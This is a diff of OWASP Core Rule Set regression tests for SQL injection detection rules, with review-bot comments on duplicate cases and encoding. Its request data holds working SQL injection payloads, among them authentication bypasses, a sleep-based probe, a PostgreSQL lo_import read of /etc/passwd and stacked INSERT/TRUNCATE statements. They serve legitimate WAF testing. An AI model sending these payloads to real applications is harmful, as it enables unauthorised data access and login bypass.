+ Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"$text": "foo"}' + output: + log_contains: id "942290" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml index f9e2d50485..383c0c4c77 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml 
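Review bot: Tests 942290-3 and 942290-4 are the same request byte for byte (`GET /mongo/show.php?u_id[$regex]=2`) under two different descriptions ("attempts 2" and "attempts 3"), so the second adds no coverage; either remove 942290-4 or give it a distinct operator that the rule is meant to cover, e.g. `uri: "/mongo/show.php?u_id[$gt]=2"`, after confirming against the pattern. The JSON-body tests 942290-5 to -9 send `Content-Type: application/json` and therefore only exercise the rule if the WAF under test parses JSON request bodies; if that is not enabled in the CI configuration they would pass or fail for the wrong reason, so a comment on 942290-5 such as `# requires JSON request-body parsing to be enabled in the test configuration` would make the dependency explicit. Also 942290-1 omits `version: HTTP/1.0` while its siblings set it — presumably harmless, but inconsistent.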
@@ -1,23 +1,55 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942300.yaml - tests: - - - test_title: 942300-1 +meta: + author: "Christian S.J. Peron, Franziska Bühler" + description: None + enabled: true + name: 942300.yaml +tests: + - test_title: 942300-1 desc: "MySQL comments, conditions and ch(a)r injectionss" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=) when 234 then&foo=bar" - version: HTTP/1.0 - output: - log_contains: id "942300" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=) when 234 then&foo=bar" + version: HTTP/1.0 + output: + log_contains: id "942300" + - test_title: 942300-2 + desc: "MySQL comments, conditions and ch(a)r injectionss" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=) when 234 then&foo=bar" + version: HTTP/1.0 + output: + log_contains: id "942300" + - test_title: 942300-3 + desc: "No false positives with for. Issue #2007" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=booked%20for%202021%28including%202020" + version: HTTP/1.0 + output: + no_log_contains: id "942300" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml index 985e77836f..17ede05256 100644 
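Review bot: Tests 942300-1 and 942300-2 are identical — same method, same `data: "var=) when 234 then&foo=bar"`, same description — so 942300-2 is a copy-paste duplicate rather than new coverage. Either give it a distinct payload that exercises another part of what the description promises (the "MySQL comments" or "ch(a)r" branch) or remove it. The new negative case 942300-3 for issue #2007 is the useful addition in this hunk and should stay.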
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml 
@@ -1,23 +1,63 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942310.yaml - tests: - - - test_title: 942310-1 - desc: "chained SQL injection attempts 2/2" +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942310.yaml +tests: + - test_title: 942310-1 + desc: | + Chained SQL injection attempts 2/2. + This test originally checked the expression `[\"'`]\s+and\s*?=\W`. We opted to remove that expression as it + does not appear to match anything useful (https://github.com/coreruleset/coreruleset/issues/2118). + This test now checks that no match occurs for something that would have matched the original expression. stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?var=%22%27%20and%20%3d%20bar" - version: HTTP/1.0 - output: - log_contains: id "942310" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=%22%27%20and%20%3d%20bar" + version: HTTP/1.0 + output: + no_log_contains: id "942310" + - test_title: 942310-2 + desc: | + Chained SQL injection attempts 2/2. + This test checks for a positive match of `\(\s*?select\s*?\w+\s*?\(`. + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var='%20and%201%20in%20(select%20min(name)%20from%20sysobjects%20where%20xtype%20%3D%20'U'%20and%20name%20%3E%20'.')%20--" + version: HTTP/1.0 + output: + log_contains: id "942310" + - test_title: 942310-3 + desc: | + Chained SQL injection attempts 2/2. + This test checks for a positive match of `order\s+by\s+if\w*?\s*?\(`. 
+ stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=order%20by%20if(1%3D1%2C1%2Csleep(1))" + version: HTTP/1.0 + output: + log_contains: id "942310" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml index 7fa85cd1ed..bb8be2c845 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml 
@@ -1,74 +1,218 @@ --- - meta: - author: "Christian S.J. Peron, Christoph Hansen" - description: None - enabled: true - name: 942320.yaml - tests: - - - test_title: 942320-1 +meta: + author: "Christian S.J. Peron, Christoph Hansen" + description: None + enabled: true + name: 942320.yaml +tests: + - test_title: 942320-1 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=procedure%20analyse%20%28" - version: HTTP/1.0 - output: - log_contains: id "942320" - - - test_title: 942320-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=procedure%20analyse%20%28" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-2 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=exec+%28%40%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" - - - test_title: 942320-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=exec+%28%40%0A" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-3 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=declare+%40b%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" - - - test_title: 942320-4 + - stage: + input: 
+ dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=declare+%40b%0A" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-4 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=DECLARE%2F%2A%2A%2F%40x%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=DECLARE%2F%2A%2A%2F%40x%0A" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-5 + desc: "Detects PostgreSQL data conversion with ::int" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=password::int" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-6 + desc: "Detects PostgreSQL data conversion with ::bool" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?no=2&id=1%27%20and%20unistr(password)::bool--" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-7 + desc: "Detects PostgreSQL bypass attempt with div(23,-2) - issue #2910" + stages: + - 
stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=div(23,-2)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-8 + desc: "Detects PostgreSQL bypass attempt with div (23.23 , 2) - issue #2910" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=div+(23.23+,+2)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-9 + desc: "Detects PostgreSQL bypass attempt lo_import'( - issue #2912" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=lo_import(%27/etc%27%20||%20%27/pass%27%20||%20%27wd%27)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-10 + desc: "Detects PostgreSQL bypass attempt with lo_get(16400) - issue #2924" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=lo_get(16400)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-11 + desc: "Detects PostgreSQL bypass attempt function(foo)::text - issue #2924" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=function(foo)::text" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-12 + desc: "Detects PostgreSQL bypass attempt function(foo)::bigint - issue #2924" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=function(foo)::bigint" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-13 + desc: "Detects PostgreSQL bypass attempt function(foo)::double precision - issue #2924" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=function(foo)::double%20precision" + version: HTTP/1.0 + output: + log_contains: id "942320" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml new file mode 100644 index 0000000000..ae9973e959 --- /dev/null +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml 
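Review bot: The description of 942320-9 says the bypass is `lo_import'(`, but the request actually sends `lo_import(%27/etc%27 || %27/pass%27 || %27wd%27)` — the quote follows the parenthesis rather than preceding it — so the text should read `Detects PostgreSQL bypass attempt with lo_import('...' || ...) - issue #2912` (or, if the intent is to name a regex fragment, quote it as such). Nine new positive cases are added for PostgreSQL `::type` casts and `lo_*` functions but no negative case; a benign value containing `::`, e.g. `uri: "/index.php?id=std::string"` with `no_log_contains: id "942320"`, would guard the cast pattern against over-matching. Whether that particular string is benign to the rule cannot be told from the tests alone, so verify it against the regex before adding it.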
@@ -0,0 +1,37 @@
+---
+meta:
+ author: "Franziska Bühler"
+ enabled: true
+ name: 942321.yaml
+tests:
+ - test_title: 942321-1
+ desc: "Detects MySQL and PostgreSQL stored procedure/function injections"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: encode(lo_get(16200),'base64')::int
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ version: HTTP/1.0
+ output:
+ log_contains: id "942321"
+ - test_title: 942321-2
+ desc: "Detects MySQL and PostgreSQL stored procedure/function injections"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: overlay(password placing $$$$ from 1)::int and id=1
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942321"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml
index 7b3e68b7f9..6e72d50fe7 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml
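Review bot: Test 942321-1 has no `uri:` key, while 942321-2 in the same file sends `uri: "/"` and every other stage added by this commit sets one; unless the runner defaults a missing uri, the first request is incomplete and the test can fail for a reason unrelated to rule 942321. Adding `uri: "/"` after `port: 80` keeps the two stages parallel. Both tests also carry the identical desc; stating which construct each one targets (the `encode(lo_get(...))::int` cast versus `overlay(... placing ... from ...)`) would make a failure self-explanatory.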
@@ -1,23 +1,89 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942330.yaml - tests: - - - test_title: 942330-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942330.yaml +tests: + - test_title: 942330-1 desc: "classic SQL injection probings 1/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=%22%27&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942330" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=%22%27&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942330" + - test_title: 942330-2 + desc: "Test first backslash match ([\"'`\x5c]*?)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=\\\"1 or 1-" + version: HTTP/1.0 + output: + log_contains: id "942330" + - test_title: 942330-3 + desc: "Test second backslash match (\x5cx(?:23|27|3d))" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=\\x23" + version: HTTP/1.0 + output: + log_contains: id "942330" + - test_title: 942330-4 + desc: "Test false positive issue nr. 
3205" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: | + "var=05111222333 + andy.surname@somedomain.com" + version: HTTP/1.0 + output: + no_log_contains: id "942330" + - test_title: 942330-5 + desc: "Test false positive issue nr. 3205" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=05111222333 andy.surname@somedomain.com" + version: HTTP/1.0 + output: + no_log_contains: id "942330" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml index 46731b271d..18ca873cbe 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml 
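Review bot: Tests 942330-2 through 942330-5 set `User-Agent: ModSecurity CRS 3 Tests`, while 942330-1 in the same hunk uses `"OWASP CRS test agent"`, the value this commit standardizes on in the sibling files; the four new stages therefore run under a different header profile from the rest of the suite and should use the same agent string. In 942330-4 the literal block `data: |` keeps the surrounding double quotes as part of the request body, so the server receives `"var=05111222333` on the first line and a trailing `"` on the second rather than the bare `var=...` value; if the quotes were only meant as YAML delimiters, the block should hold the unquoted value, otherwise a comment should say the quotes are intentional.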
@@ -1,24 +1,191 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942340.yaml - tests: - - - test_title: 942340-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942340.yaml +tests: + - test_title: 942340-1 desc: "basic SQL authentication bypass attempts 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - # in ( select * from - uri: "/?var=in%20%28%20select%20%2a%20from" - version: HTTP/1.0 - output: - log_contains: id "942340" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # in ( select * from + uri: "/?var=in%20%28%20select%20%2a%20from" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-2 + desc: "SQLite authentication bypass with except select" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except \tselect.1,2 + uri: "/?var=except%20%09select.1%2C2" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-3 + desc: "SQLite authentication bypass with except values" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except values (1,2) + uri: "/?var=except%20values(1%2C2)" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-4 + desc: "true-negative except selecting" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: 
localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except selecting + uri: "/?var=except%20selecting" + version: HTTP/1.0 + output: + no_log_contains: id "942340" + - test_title: 942340-5 + desc: "basic SQL authentication bypass attempts 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=x'%20or%20array[id]%20is%20not%20null--" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-6 + desc: "basic SQL authentication bypass attempts 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=x'%20or%20email~all(array[email]);analyze--" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-7 + desc: "basic SQL authentication bypass attempts 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email='%20and%20email%20not%20similar%20to%20id--" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-8 + desc: "basic SQL authentication bypass attempts 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + 
method: POST + port: 80 + uri: "/" + data: "email='%20or%20true;%20foo" + version: HTTP/1.0 + output: + log_contains: id "942340" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email='%20or%20false;%20foo" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-9 + desc: "basic SQL authentication bypass attempts 3/3 (no whitespace between operator)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email='||true" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-10 + desc: "SQL Auth Bypass FP test (invalid operator without whitespace)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email='ortrue" + version: HTTP/1.0 + output: + no_log_contains: id "942340" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml index 0c8567c0c9..c9c7804067 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml 
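Review bot: Tests 942340-5 through 942340-8 reuse the desc `basic SQL authentication bypass attempts 3/3` from 942340-1, so a failure report does not say which construct (`array[id] is not null`, `~all(array[email])`, `not similar to`, or `or true;`/`or false;`) regressed; 942340-2 and 942340-3 show the more useful pattern of a per-case desc, e.g. `desc: "SQL authentication bypass with array[...] is not null"`. 942340-8 bundles the `or true` and `or false` variants as two stages under one title, which is fine, but naming both in the desc keeps a partial failure attributable. The positive/negative pairing with 942340-4 and 942340-10 is otherwise consistent.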
@@ -1,41 +1,74 @@ --- - meta: - author: "Christian S.J. Peron, Franziska Bühler" - description: None - enabled: true - name: 942350.yaml - tests: - - - test_title: 942350-1 +meta: + author: "Christian S.J. Peron, Franziska Bühler" + description: None + enabled: true + name: 942350.yaml +tests: + - test_title: 942350-1 desc: "MySQL UDF injection and other data/structure manipulation" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - # ; insert INTO table (word) VALUES('dfsd') - uri: "/?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES" - version: HTTP/1.0 - output: - log_contains: id "942350" - - - test_title: 942350-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # ; insert INTO table (word) VALUES('dfsd') + uri: "/?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES" + version: HTTP/1.0 + output: + log_contains: id "942350" + - test_title: 942350-2 desc: "Fix for FP reported in GitHub issue 1587" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - # ;insertion_424242 - uri: "/?var=%3Binsertion_424242" - version: HTTP/1.0 - output: - no_log_contains: id "942350" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # ;insertion_424242 + uri: "/?var=%3Binsertion_424242" + version: HTTP/1.0 + output: + no_log_contains: id "942350" + - test_title: 942350-3 + desc: "MySQL create function injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # CREATE FUNCTION hello (s CHAR(20)) RETURNS CHAR(50) DETERMINISTIC RETURN CONCAT('Hello, ',s,'!'); + uri: "/?var=CREATE+FUNCTION+hello+%28s+CHAR%2820%29%29+RETURNS+CHAR%2850%29+DETERMINISTIC+RETURN+CONCAT%28%27Hello%2C+%27%2Cs%2C%27%21%27%29%3B" + version: HTTP/1.0 + output: + log_contains: id "942350" + - test_title: 942350-4 + desc: "Status Page Test - MySQL injection with ;truncate[xx" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?test=;truncate[xx" + version: HTTP/1.0 + output: + log_contains: id "942350" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml index 21d20c4f02..138c90027d 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml 
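Review bot: 942350-4 sends `uri: "/?test=;truncate[xx"` with a raw `[`, whereas 942350-1 through 942350-3 percent-encode every reserved character in the query; `[` is not a permitted query character under RFC 3986, so whether it reaches the rule unchanged depends on how the test runner and the web server handle it, which can make the test pass or fail for reasons unrelated to the regex. Encoding it as `uri: "/?test=%3Btruncate%5Bxx"` and adding a comment with the decoded form, as 942350-3 does, keeps the request unambiguous. The desc `Status Page Test - MySQL injection with ;truncate[xx` could also name the issue it came from, as 942350-2 does.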
